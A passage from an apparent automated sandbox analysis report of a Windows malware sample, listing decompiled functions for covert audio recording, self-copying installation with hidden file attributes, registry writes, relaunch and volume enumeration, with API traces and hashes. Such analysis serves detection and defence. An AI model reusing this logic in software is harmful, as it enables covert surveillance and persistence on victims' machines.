                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041AC64
                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041AC7C
                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041AC91
                    • SetEvent.KERNEL32 ref: 0041ACAE
                    • WaitForSingleObject.KERNEL32(000001F4), ref: 0041ACBF
                    • CloseHandle.KERNEL32 ref: 0041ACCF
                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041ACF1
                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041ACFB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                    • String ID: alias audio$" type $close audio$hIG$hIG$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                    • API String ID: 738084811-2475295406
                    • Opcode ID: 349a88d3ce12dca492bd03558fe86ffde62c7548a3697f51e5c12e734e100348
                    • Instruction ID: 813434e77fb9aceb7b1f42a6dc2e67e87d84734dba494a054e33f3de4218d312
                    • Opcode Fuzzy Hash: 349a88d3ce12dca492bd03558fe86ffde62c7548a3697f51e5c12e734e100348
                    • Instruction Fuzzy Hash: 825185B17443056BD214BB31DC96AAB775CEB80359F10043FB246A21E2EF789D49C6AF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E00401A6D(WCHAR* __ecx, signed int __edx) {
                    				void _v4;
                    				void _v8;
                    				void _v12;
                    				void _v16;
                    				void _v20;
                    				void _v24;
                    				long _v28;
                    				signed int _t36;
                    				void** _t75;
                    				signed int _t80;
                    				void* _t81;
                    				signed int _t83;
                    
                    				_t75 = __edx;
                    				_t80 =  *0x471aaa & 0x0000ffff;
                    				_t83 = ( *0x471ab6 & 0x0000ffff) * _t80;
                    				_v16 = 1;
                    				_v20 = 0x10;
                    				_v12 = _t83 *  *0x471aac >> 3;
                    				asm("cdq");
                    				_v8 = _t83 + (__edx & 0x00000007) >> 3;
                    				_t5 =  &(_t75[1]); // 0x0
                    				_t36 =  *_t5 * _t80;
                    				_v4 = _t36;
                    				_v24 = _t36 + 0x24;
                    				_t81 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
                    				if(_t81 != 0xffffffff) {
                    					_push(0);
                    					WriteFile(_t81, "RIFF", 0, 4,  &_v28);
                    					WriteFile(_t81,  &_v24, 0,  &_v28, 0);
                    					WriteFile(_t81, "WAVE", 0,  &_v28, 0);
                    					WriteFile(_t81, "fmt ", 0,  &_v28, 0);
                    					WriteFile(_t81,  &_v20, 0,  &_v28, 0);
                    					WriteFile(_t81,  &_v16, 2,  &_v28, 0);
                    					WriteFile(_t81, 0x471aaa, 2,  &_v28, 0);
                    					WriteFile(_t81, 0x471aac, 0,  &_v28, 0);
                    					WriteFile(_t81,  &_v12, 0,  &_v28, 0);
                    					WriteFile(_t81,  &_v8, 2,  &_v28, 0);
                    					WriteFile(_t81, 0x471ab6, 2,  &_v28, 0);
                    					WriteFile(_t81, "data", 0,  &_v28, 0);
                    					WriteFile(_t81,  &_v4, 0,  &_v28, 0);
                    					_t28 =  &(_t75[1]); // 0x0
                    					WriteFile(_t81,  *_t75,  *_t28,  &_v28, 0);
                    					CloseHandle(_t81);
                    					return 1;
                    				}
                    				return 0;
                    			}















                    0x00401a7a
                    0x00401a7d
                    0x00401a86
                    0x00401a94
                    0x00401aaa
                    0x00401ab5
                    0x00401abb
                    0x00401ac4
                    0x00401ac8
                    0x00401acb
                    0x00401ace
                    0x00401ad5
                    0x00401adf
                    0x00401ae4
                    0x00401af7
                    0x00401b03
                    0x00401b13
                    0x00401b23
                    0x00401b33
                    0x00401b43
                    0x00401b54
                    0x00401b65
                    0x00401b75
                    0x00401b85
                    0x00401b96
                    0x00401ba7
                    0x00401bb7
                    0x00401bc7
                    0x00401bd0
                    0x00401bd6
                    0x00401bd9
                    0x00000000
                    0x00401bdf
                    0x00000000

                    APIs
                    • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                    • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                    • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                    • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                    • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                    • WriteFile.KERNEL32(00000000,00471AAA,00000002,00000000,00000000), ref: 00401B65
                    • WriteFile.KERNEL32(00000000,00471AAC,00000004,00000000,00000000), ref: 00401B75
                    • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                    • WriteFile.KERNEL32(00000000,00471AB6,00000002,00000000,00000000), ref: 00401BA7
                    • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Write$Create
                    • String ID: RIFF$WAVE$data$fmt
                    • API String ID: 1602526932-4212202414
                    • Opcode ID: f2b6e76ceb7bfb9885aaa78eb70036a0507d1c5f181501d500e5ed80fb4de35f
                    • Instruction ID: 177051005fb416a51f2ba2744db31deb309417c049a186a26b29265ecea9e37c
                    • Opcode Fuzzy Hash: f2b6e76ceb7bfb9885aaa78eb70036a0507d1c5f181501d500e5ed80fb4de35f
                    • Instruction Fuzzy Hash: 96416D726443187AE210DA55DC86FBB7EECEB85B50F40041AF644D6090D7A4E909DBB7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00407197() {
                    				_Unknown_base(*)()* _t4;
                    				_Unknown_base(*)()* _t6;
                    				_Unknown_base(*)()* _t9;
                    				_Unknown_base(*)()* _t11;
                    				_Unknown_base(*)()* _t13;
                    				_Unknown_base(*)()* _t15;
                    				WCHAR* _t17;
                    
                    				_t17 = L"ntdll.dll";
                    				_t4 = GetProcAddress(GetModuleHandleW(_t17), "RtlInitUnicodeString");
                    				 *0x471afc = _t4;
                    				if(_t4 != 0) {
                    					_t6 = GetProcAddress(GetModuleHandleW(_t17), "NtAllocateVirtualMemory");
                    					 *0x471b00 = _t6;
                    					if(_t6 == 0) {
                    						goto L1;
                    					}
                    					_t9 = GetProcAddress(GetModuleHandleW(_t17), "NtFreeVirtualMemory");
                    					 *0x471b0c = _t9;
                    					if(_t9 == 0) {
                    						goto L1;
                    					}
                    					_t11 = GetProcAddress(GetModuleHandleW(_t17), "RtlAcquirePebLock");
                    					 *0x471b04 = _t11;
                    					if(_t11 == 0) {
                    						goto L1;
                    					}
                    					_t13 = GetProcAddress(GetModuleHandleW(_t17), "RtlReleasePebLock");
                    					 *0x471b10 = _t13;
                    					if(_t13 == 0) {
                    						goto L1;
                    					}
                    					_t15 = GetProcAddress(GetModuleHandleW(_t17), "LdrEnumerateLoadedModules");
                    					 *0x471af8 = _t15;
                    					return 0 | _t15 != 0x00000000;
                    				}
                    				L1:
                    				return 0;
                    			}










                    0x0040719f
                    0x004071b4
                    0x004071b6
                    0x004071bd
                    0x004071cc
                    0x004071ce
                    0x004071d5
                    0x00000000
                    0x00000000
                    0x004071e0
                    0x004071e2
                    0x004071e9
                    0x00000000
                    0x00000000
                    0x004071f4
                    0x004071f6
                    0x004071fd
                    0x00000000
                    0x00000000
                    0x00407208
                    0x0040720a
                    0x00407211
                    0x00000000
                    0x00000000
                    0x0040721c
                    0x00407220
                    0x00000000
                    0x0040722a
                    0x004071bf
                    0x00000000

                    APIs
                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\BiU282bjyR.exe,00000001,00407574,C:\Users\user\Desktop\BiU282bjyR.exe,00000003,0040759C,004742C0,004075F5), ref: 004071AB
                    • GetProcAddress.KERNEL32(00000000), ref: 004071B4
                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004071C9
                    • GetProcAddress.KERNEL32(00000000), ref: 004071CC
                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004071DD
                    • GetProcAddress.KERNEL32(00000000), ref: 004071E0
                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004071F1
                    • GetProcAddress.KERNEL32(00000000), ref: 004071F4
                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407205
                    • GetProcAddress.KERNEL32(00000000), ref: 00407208
                    • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 00407219
                    • GetProcAddress.KERNEL32(00000000), ref: 0040721C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: C:\Users\user\Desktop\BiU282bjyR.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                    • API String ID: 1646373207-3490079102
                    • Opcode ID: 81428fbf71c9aa697a618bcafc9170efe3c6a797c1b89d00afd51bfe2004ed6f
                    • Instruction ID: 31a065220343a7c7566a864782482d5f68138682db9650b7bace8811c730af5e
                    • Opcode Fuzzy Hash: 81428fbf71c9aa697a618bcafc9170efe3c6a797c1b89d00afd51bfe2004ed6f
                    • Instruction Fuzzy Hash: 560171F0E0470636C710677E1C44E4B6E9C9E412913194837B809F22E1FEBCE8408E7D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E0040CC02(char __ecx, void* __edx, void* __eflags, WCHAR* _a4, char _a8, char _a12) {
                    				char _v24;
                    				char _v28;
                    				void* _v32;
                    				char _v48;
                    				char _v49;
                    				char _v52;
                    				void* _v56;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t22;
                    				void* _t23;
                    				WCHAR* _t28;
                    				int _t29;
                    				void* _t35;
                    				WCHAR* _t43;
                    				int _t45;
                    				int _t48;
                    				WCHAR* _t54;
                    				int _t55;
                    				void* _t70;
                    				void* _t130;
                    				void* _t131;
                    				void* _t135;
                    
                    				_t135 =  &_v56;
                    				_t130 = __edx;
                    				_v49 = __ecx;
                    				_t22 = E0043B4CB(__edx);
                    				_t139 = _t22;
                    				if(_t22 == 0) {
                    					_t73 = _a4;
                    					_t125 = _v49;
                    					_t23 = E0040D83D( &_v24, _v49, _a4);
                    					_t131 = 0x4742c0;
                    					E00401F13(0x4742c0, _v49, 0x4742c0, _t23);
                    				} else {
                    					CreateDirectoryW(E00401F04(0x4742f0), 0);
                    					_t73 = _a4;
                    					_t125 = E00409082( &_v24, 0x4742f0, 0x4742f0, "\\");
                    					_t70 = E00403014(_a4,  &_v48, _t69, _t130, 0x4742f0, _t139, _t73);
                    					_t131 = 0x4742c0;
                    					E00401F13(0x4742c0, _t69, 0x4742c0, _t70);
                    					E00401F09();
                    				}
                    				E00401F09();
                    				if(E0043F32F(E00401F04(_t131), 0x471b38, _t26) != 0) {
                    					_t28 = E00401F04(_t131);
                    					_t134 = CopyFileW;
                    					_t29 = CopyFileW(0x471b38, _t28, 0);
                    					__eflags = _t29;
                    					if(_t29 != 0) {
                    						L14:
                    						_push(E00401F04(0x4742a8));
                    						E0040CB16(0x4742a8);
                    						__eflags = _a8 - 1;
                    						if(_a8 == 1) {
                    							_t43 = E00401F04(_t131);
                    							_t73 = SetFileAttributesW;
                    							SetFileAttributesW(_t43, 7);
                    							_t45 = E0043B4CB(_t130);
                    							__eflags = _t45;
                    							if(_t45 != 0) {
                    								SetFileAttributesW(E00401F04(0x4742f0), 7);
                    							}
                    						}
                    						__eflags = _a12;
                    						if(_a12 != 0) {
                    							E0040417E(_t73, _t135 - 0x1c, _t125, _t134, "C:\Users\hardz\Desktop\BiU282bjyR.exe");
                    							_push(L"del");
                    							E004133C2(0x80000001, E00401F04(E0041B6F3( &_v28, 0x4742d8)));
                    							E00401F09();
                    						}
                    						CloseHandle( *0x471d44);
                    						_t35 = ShellExecuteW(0, L"open", E00401F04(_t131), 0x46b928, 0x46b928, 1);
                    						__eflags = _t35 - 0x20;
                    						if(_t35 > 0x20) {
                    							ExitProcess(0);
                    						} else {
                    							E0040CE72();
                    							L13:
                    							return 0;
                    						}
                    					}
                    					__eflags = _v49 - 0x36;
                    					if(_v49 == 0x36) {
                    						goto L14;
                    					}
                    					_t48 = E0043B4CB(_t130);
                    					_t125 = 0x36;
                    					__eflags = _t48;
                    					if(_t48 == 0) {
                    						E00401F13(_t131, 0x36, _t131, E0040D83D( &_v24, 0x36, _t73));
                    					} else {
                    						E00401F13(0x4742f0, 0x36, _t131, E0040D83D( &_v24, 0x36, _t130));
                    						E00401F09();
                    						_t125 = E00409082( &_v52, 0x4742f0, CopyFileW, "\\");
                    						E00401F13(_t131, _t60, _t131, E00403014(_t73,  &_v28, _t60, _t130, CopyFileW, __eflags, _t73));
                    						E00401F09();
                    					}
                    					E00401F09();
                    					CreateDirectoryW(E00401F04(0x4742f0), 0);
                    					_t54 = E00401F04(_t131);
                    					_t73 = 0x471b38;
                    					_t55 = CopyFileW(0x471b38, _t54, 0);
                    					__eflags = _t55;
                    					if(_t55 != 0) {
                    						goto L14;
                    					} else {
                    						L00408F7E(0x471b38, _t131, _t125, 0x471b38);
                    						goto L13;
                    					}
                    				} else {
                    					_push(E00401F04(0x4742a8));
                    					E0040CB16(0x4742a8);
                    					return 1;
                    				}
                    			}




























                    0x0040cc02
                    0x0040cc09
                    0x0040cc0b
                    0x0040cc10
                    0x0040cc1b
                    0x0040cc1d
                    0x0040cc69
                    0x0040cc71
                    0x0040cc76
                    0x0040cc7c
                    0x0040cc84
                    0x0040cc1f
                    0x0040cc29
                    0x0040cc2f
                    0x0040cc45
                    0x0040cc4b
                    0x0040cc51
                    0x0040cc59
                    0x0040cc62
                    0x0040cc62
                    0x0040cc8d
                    0x0040cca9
                    0x0040cccc
                    0x0040ccd3
                    0x0040ccd9
                    0x0040ccdb
                    0x0040ccdd
                    0x0040cda2
                    0x0040cdac
                    0x0040cdae
                    0x0040cdb3
                    0x0040cdba
                    0x0040cdc0
                    0x0040cdc5
                    0x0040cdcc
                    0x0040cdcf
                    0x0040cdd5
                    0x0040cdd7
                    0x0040cde6
                    0x0040cde6
                    0x0040cdd7
                    0x0040cde8
                    0x0040cded
                    0x0040cdf9
                    0x0040cdfe
                    0x0040ce1f
                    0x0040ce2b
                    0x0040ce2b
                    0x0040ce36
                    0x0040ce54
                    0x0040ce5a
                    0x0040ce5d
                    0x0040ce6b
                    0x0040ce5f
                    0x0040ce5f
                    0x0040cd9b
                    0x00000000
                    0x0040cd9b
                    0x0040ce5d
                    0x0040cce3
                    0x0040cce8
                    0x00000000
                    0x00000000
                    0x0040ccef
                    0x0040ccf4
                    0x0040ccfb
                    0x0040ccfd
                    0x0040cd5c
                    0x0040ccff
                    0x0040cd0c
                    0x0040cd15
                    0x0040cd2f
                    0x0040cd3e
                    0x0040cd47
                    0x0040cd4c
                    0x0040cd65
                    0x0040cd77
                    0x0040cd81
                    0x0040cd87
                    0x0040cd8d
                    0x0040cd8f
                    0x0040cd91
                    0x00000000
                    0x0040cd93
                    0x0040cd96
                    0x00000000
                    0x0040cd96
                    0x0040ccab
                    0x0040ccb5
                    0x0040ccb7
                    0x00000000
                    0x0040ccbe

                    APIs
                    • _wcslen.LIBCMT ref: 0040CC10
                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,X2},0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CC29
                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\BiU282bjyR.exe,00000000,00000000,00000000,00000000,00000000,?,X2},0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CCD9
                    • _wcslen.LIBCMT ref: 0040CCEF
                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CD77
                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\BiU282bjyR.exe,00000000,00000000), ref: 0040CD8D
                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CDCC
                    • _wcslen.LIBCMT ref: 0040CDCF
                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CDE6
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,X2},0000000E), ref: 0040CE36
                    • ShellExecuteW.SHELL32(00000000,open,00000000,0046B928,0046B928,00000001), ref: 0040CE54
                    • ExitProcess.KERNEL32 ref: 0040CE6B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                    • String ID: 6$C:\Users\user\Desktop\BiU282bjyR.exe$X2}$del$open
                    • API String ID: 1579085052-1572404129
                    • Opcode ID: 07e39ec3a768c0453246325666e454c338eec988a846cb9b906b9ed470ebe19f
                    • Instruction ID: 42ce3b3a717a48cb626f87c4b7f90668249161210a9f5c1fc97feec6c8679fcb
                    • Opcode Fuzzy Hash: 07e39ec3a768c0453246325666e454c338eec988a846cb9b906b9ed470ebe19f
                    • Instruction Fuzzy Hash: F751C421208201ABD619B7769C92F7F67989F90719F50453FF609A62E3EF3C9C04826E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E0041BAB0(WCHAR* __ecx) {
                    				intOrPtr _t51;
                    				void* _t53;
                    				void* _t54;
                    				long _t60;
                    				short _t64;
                    				void* _t67;
                    				void* _t74;
                    				void* _t79;
                    				signed int _t81;
                    				WCHAR* _t84;
                    				long _t85;
                    				signed int _t86;
                    				signed int _t87;
                    				void* _t88;
                    				void* _t89;
                    
                    				_t84 = __ecx;
                    				 *((intOrPtr*)(_t88 + 0x14)) = 0x105;
                    				_t85 = 0;
                    				_t81 = 0;
                    				_t86 = 0;
                    				if(lstrlenW(__ecx) <= 0) {
                    					L7:
                    					_t84[_t81] = 0;
                    					E00436320(_t88 + 0x634, _t84, 2 + _t81 * 2);
                    					_t89 = _t88 + 0xc;
                    					_t51 = _t89 + 0x18;
                    					__imp__FindFirstVolumeW(_t51, 0x104);
                    					 *((intOrPtr*)(_t89 + 0x10)) = _t51;
                    					if(_t51 != 0xffffffff) {
                    						while(1) {
                    							_t53 = E0043B4CB(_t89 + 0x18);
                    							_t29 = _t53 - 1; // -1
                    							_t87 = _t29;
                    							_t54 = 0x5c;
                    							if( *((intOrPtr*)(_t89 + 0x18)) != _t54) {
                    								break;
                    							}
                    							if( *((intOrPtr*)(_t89 + 0x1a)) != _t54 ||  *((short*)(_t89 + 0x1c)) != 0x3f ||  *((intOrPtr*)(_t89 + 0x1e)) != _t54 ||  *((intOrPtr*)(_t89 + 0x18 + _t87 * 2)) != _t54) {
                    								break;
                    							} else {
                    								 *((short*)(_t89 + 0x18 + _t87 * 2)) = 0;
                    								_t60 = QueryDosDeviceW(_t89 + 0x28, _t89 + 0x428, 0x64);
                    								 *(_t89 + 0x14) = _t60;
                    								if(_t60 == 0) {
                    									L24:
                    									_t85 = GetLastError();
                    									L18:
                    									__imp__FindVolumeClose( *((intOrPtr*)(_t89 + 0x10)));
                    									return 0 | _t85 == 0x00000000;
                    								}
                    								if(lstrcmpW(_t89 + 0x42c, _t84) == 0) {
                    									_t64 = 0x5c;
                    									 *((short*)(_t89 + 0x18 + _t87 * 2)) = _t64;
                    									_t67 = _t89 + 0x24;
                    									__imp__GetVolumePathNamesForVolumeNameW(_t67, _t89 + 0x228,  *((intOrPtr*)(_t89 + 0x18)), _t89 + 0x14);
                    									if(_t67 == 0) {
                    										goto L24;
                    									}
                    									lstrcatW(_t89 + 0x224,  &(( &(_t84[1]))[_t81]));
                    									lstrcpyW(_t84, _t89 + 0x220);
                    									goto L18;
                    								}
                    								_t74 = _t89 + 0x1c;
                    								__imp__FindNextVolumeW( *((intOrPtr*)(_t89 + 0x18)), _t74, 0x104);
                    								if(_t74 == 0) {
                    									_t85 = GetLastError();
                    									if(_t85 != 0x12) {
                    										goto L18;
                    									}
                    									break;
                    								}
                    								continue;
                    							}
                    						}
                    						_t85 = 0xa1;
                    						goto L18;
                    					}
                    					GetLastError();
                    					return 0;
                    				}
                    				_t78 = _t84;
                    				 *(_t88 + 0x10) = _t84;
                    				while(1) {
                    					_t79 = E004369FA(_t78, "\\", 2);
                    					_t88 = _t88 + 0xc;
                    					if(_t79 != 0) {
                    						goto L4;
                    					}
                    					_t81 = _t81 + 1;
                    					if(_t81 == 3) {
                    						_t81 = _t86;
                    						goto L7;
                    					}
                    					L4:
                    					 *(_t88 + 0x10) =  &(( *(_t88 + 0x10))[1]);
                    					_t86 = _t86 + 1;
                    					if(_t86 >= lstrlenW(_t84)) {
                    						goto L7;
                    					}
                    					_t78 =  *(_t88 + 0x10);
                    				}
                    			}


















                    0x0041baba
                    0x0041babc
                    0x0041bac4
                    0x0041bac7
                    0x0041bac9
                    0x0041bad3
                    0x0041bb0e
                    0x0041bb10
                    0x0041bb25
                    0x0041bb2a
                    0x0041bb2d
                    0x0041bb37
                    0x0041bb3d
                    0x0041bb44
                    0x0041bbcb
                    0x0041bbd0
                    0x0041bbd8
                    0x0041bbd8
                    0x0041bbdb
                    0x0041bbe1
                    0x00000000
                    0x00000000
                    0x0041bb5c
                    0x00000000
                    0x0041bb78
                    0x0041bb7a
                    0x0041bb8e
                    0x0041bb94
                    0x0041bb9a
                    0x0041bc65
                    0x0041bc6b
                    0x0041bbec
                    0x0041bbf0
                    0x00000000
                    0x0041bbfa
                    0x0041bbb1
                    0x0041bc19
                    0x0041bc1a
                    0x0041bc30
                    0x0041bc35
                    0x0041bc3d
                    0x00000000
                    0x00000000
                    0x0041bc4e
                    0x0041bc5d
                    0x00000000
                    0x0041bc5d
                    0x0041bbb8
                    0x0041bbc1
                    0x0041bbc9
                    0x0041bc0e
                    0x0041bc13
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0041bc15
                    0x00000000
                    0x0041bbc9
                    0x0041bb5c
                    0x0041bbe7
                    0x00000000
                    0x0041bbe7
                    0x0041bb4a
                    0x00000000
                    0x0041bb50
                    0x0041bad5
                    0x0041bad7
                    0x0041badb
                    0x0041bae3
                    0x0041bae8
                    0x0041baed
                    0x00000000
                    0x00000000
                    0x0041baef
                    0x0041baf3
                    0x0041bb0c
                    0x00000000
                    0x0041bb0c
                    0x0041baf5
                    0x0041baf5
                    0x0041bafa
                    0x0041bb04
                    0x00000000
                    0x00000000
                    0x0041bb06
                    0x0041bb06

                    APIs
                    • lstrlenW.KERNEL32(?), ref: 0041BACB
                    • _memcmp.LIBVCRUNTIME ref: 0041BAE3
                    • lstrlenW.KERNEL32(?), ref: 0041BAFC
                    • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041BB37
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041BB4A
                    • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041BB8E
                    • lstrcmpW.KERNEL32(?,?), ref: 0041BBA9
                    • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041BBC1
                    • _wcslen.LIBCMT ref: 0041BBD0
                    • FindVolumeClose.KERNEL32(?), ref: 0041BBF0
                    • GetLastError.KERNEL32 ref: 0041BC08
                    • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041BC35
                    • lstrcatW.KERNEL32(?,?), ref: 0041BC4E
                    • lstrcpyW.KERNEL32 ref: 0041BC5D
                    • GetLastError.KERNEL32 ref: 0041BC65
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                    • String ID: ?
                    • API String ID: 3941738427-1684325040
                    • Opcode ID: 32159e4e87086a24e607b2bf005db5dd4440ed3d025f851ff32f3e02b5a9dc45
                    • Instruction ID: a25ba5a5dfe03687ff21c6f287b36430678c76147cb6a02f95752ff5a5ab5041
                    • Opcode Fuzzy Hash: 32159e4e87086a24e607b2bf005db5dd4440ed3d025f851ff32f3e02b5a9dc45
                    • Instruction Fuzzy Hash: 1141AE71608705ABC720DF61DC48AEB77E8EB88715F00092FF541D2661EF78D9898BDA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E0044EE3D(signed int _a4, signed int _a8) {
                    				signed int _v0;
                    				signed char _v5;
                    				intOrPtr _v8;
                    				signed char _v9;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				intOrPtr _v24;
                    				signed int _v44;
                    				signed int _v92;
                    				signed int _v128;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t116;
                    				signed int _t119;
                    				signed int _t120;
                    				signed int _t122;
                    				signed int _t123;
                    				signed int _t126;
                    				signed int _t127;
                    				signed int _t131;
                    				signed int _t133;
                    				signed int _t136;
                    				signed int _t138;
                    				signed int _t139;
                    				signed int _t142;
                    				void* _t143;
                    				signed int _t148;
                    				signed int* _t150;
                    				signed int* _t156;
                    				signed int _t163;
                    				signed int _t165;
                    				signed int _t167;
                    				intOrPtr _t168;
                    				signed int _t173;
                    				signed int _t175;
                    				signed int _t176;
                    				signed int _t180;
                    				signed int _t185;
                    				intOrPtr* _t186;
                    				signed int _t191;
                    				signed int _t196;
                    				signed int _t197;
                    				signed int _t204;
                    				intOrPtr* _t205;
                    				signed int _t214;
                    				signed int _t215;
                    				signed int _t217;
                    				signed int _t218;
                    				signed int _t220;
                    				signed int _t221;
                    				signed int _t223;
                    				intOrPtr _t225;
                    				void* _t231;
                    				signed int _t233;
                    				void* _t236;
                    				signed int _t237;
                    				signed int _t238;
                    				void* _t241;
                    				signed int _t244;
                    				signed int _t246;
                    				void* _t252;
                    				signed int _t253;
                    				signed int _t254;
                    				void* _t260;
                    				void* _t262;
                    				signed int _t263;
                    				intOrPtr* _t267;
                    				intOrPtr* _t271;
                    				signed int _t274;
                    				signed int _t276;
                    				signed int _t280;
                    				signed int _t282;
                    				void* _t283;
                    				void* _t284;
                    				void* _t285;
                    				signed int _t286;
                    				signed int _t288;
                    				signed int _t290;
                    				signed int _t291;
                    				signed int* _t292;
                    				signed int _t298;
                    				signed int _t299;
                    				CHAR* _t300;
                    				signed int _t302;
                    				signed int _t303;
                    				WCHAR* _t304;
                    				signed int _t305;
                    				signed int _t306;
                    				signed int* _t307;
                    				signed int _t308;
                    				signed int _t310;
                    				void* _t316;
                    				void* _t317;
                    				void* _t318;
                    				void* _t320;
                    				void* _t321;
                    				void* _t322;
                    				void* _t323;
                    
                    				_t217 = _a4;
                    				if(_t217 != 0) {
                    					_t286 = _t217;
                    					_t116 = E004382F0(_t217, 0x3d);
                    					_v16 = _t116;
                    					_t231 = _t285;
                    					__eflags = _t116;
                    					if(_t116 == 0) {
                    						L10:
                    						 *((intOrPtr*)(E0043FFBD())) = 0x16;
                    						goto L11;
                    					} else {
                    						__eflags = _t116 - _t217;
                    						if(_t116 == _t217) {
                    							goto L10;
